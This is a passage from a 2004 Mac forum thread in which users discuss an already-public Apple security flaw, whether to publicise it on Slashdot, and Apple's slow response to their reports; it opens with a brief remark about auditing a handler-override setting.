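Run it as-is to see the constructed before/after states; call audit_user_prefs() on a real machine to check the live file. Treating a missing override as "unset" rather than "redirected" matters: the absence of an entry means the default handler applies, which is exactly the exposed configuration.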
     
Spliffdaddy
Posting Junkie
Join Date: Oct 2001
Location: South of the Mason-Dixon line
Status: Offline
Reply With Quote
May 16, 2004, 10:24 AM
 
Still hasn't appeared on Slashdot.

Although, there's a May 5th article referencing Apple's inherent lack of public acknowledgement when it comes to security issues.

lol.

If this blatant security flaw doesn't get mentioned on Slashdot's site, I'll just piggyback it on my next copper pipe peecee project. Those always seem to get Slashdotted.
     
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
Status: Offline
Reply With Quote
May 16, 2004, 10:39 AM
 
Originally posted by theolein:
I apologise to those who think one should keep quiet, but I simply don't see the logic behind that in this case where the vulnerability is already public knowledge.
Well, it made more sense to keep quiet when I thought it was just discovered two days ago. Since it's been 2 or 3 months since it was reported to Apple, go ahead and do it, but I would also urge everyone in this thread to send notification to Apple about the flaw to that security page that JLL posted.
     
utidjian
Senior User
Join Date: Jan 2001
Location: Mahwah, NJ USA
Status: Offline
Reply With Quote
May 16, 2004, 11:39 AM
 
Originally posted by Spliffdaddy:
Still hasn't appeared on Slashdot.

Although, there's a May 5th article referencing Apple's inherent lack of public acknowledgement when it comes to security issues.

lol.

If this blatant security flaw doesn't get mentioned on Slashdot's site, I'll just piggyback it on my next copper pipe peecee project. Those always seem to get Slashdotted.
Just post it as a comment to some other article. Pick something popular and post early... eventually it will be picked up.
-DU-...etc...
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
Status: Offline
Reply With Quote
May 16, 2004, 12:22 PM
 
Originally posted by Spliffdaddy:
Still hasn't appeared on Slashdot.

Although, there's a May 5th article referencing Apple's inherent lack of public acknowledgement when it comes to security issues.

lol.

If this blatant security flaw doesn't get mentioned on Slashdot's site, I'll just piggyback it on my next copper pipe peecee project. Those always seem to get Slashdotted.
My submitted article is still in pending status.
weird wabbit
     
zen jihad
Registered User
Join Date: May 2004
Location: Just a groove in "G"
Status: Offline
Reply With Quote
May 16, 2004, 12:35 PM
 
has anyone heard anything from Apple yet?
     
lixlpixel
Fresh-Faced Recruit
Join Date: May 2004
Status: Offline
Reply With Quote
May 16, 2004, 12:47 PM
 
Originally posted by zen jihad:
has anyone heard anything from Apple yet?
no
     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
Status: Offline
Reply With Quote
May 16, 2004, 01:24 PM
 
Originally posted by zen jihad:
has anyone heard anything from Apple yet?
Nothing but an automated reply.
JLL

- My opinions may have changed, but not the fact that I am right.
     
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
Status: Offline
Reply With Quote
May 16, 2004, 02:50 PM
 
Originally posted by JLL:
Nothing but an automated reply.
The earliest we could expect something is Monday. They probably won't say anything on a weekend.
     
utidjian
Senior User
Join Date: Jan 2001
Location: Mahwah, NJ USA
Status: Offline
Reply With Quote
May 16, 2004, 04:03 PM
 
A totally fabricated scenario deleted.

Originally posted by Person Man:

At best, you can say that, in the end, Apple and Microsoft aren't any better or worse than each other. Of course, some people will still probably label me a "zealot" for saying this. But a zealot would still be trying to defend Apple more than I am. Now that I have actually bothered to look at the very first link in the very first post in this thread, I've changed my mind to be more in line with everyone else's. But I'm still trying to be a bit more realistic. (in my not so humble opinion).
Oh give me a break. You went to some length to fabricate a totally fictitious scenario and then you claim to be "trying to be a bit more realistic." If anything like your scenario actually happened between software engineers and Apple engineers are at least as good as we hope they are... then all "Person 2" would have to do to get "Person 1" to shut up and understand is write a tiny little bit of HTML. As we have seen, it could have been a single short line. That is how the software engineers I work with settle disputes. It's called "show me the code".

Face it, the engineers at Apple AND the people who manage them screwed up somehow. That "somehow" may never be known. What is far more interesting, to me, is how they are going to un-screw it... and when.
-DU-...etc...
     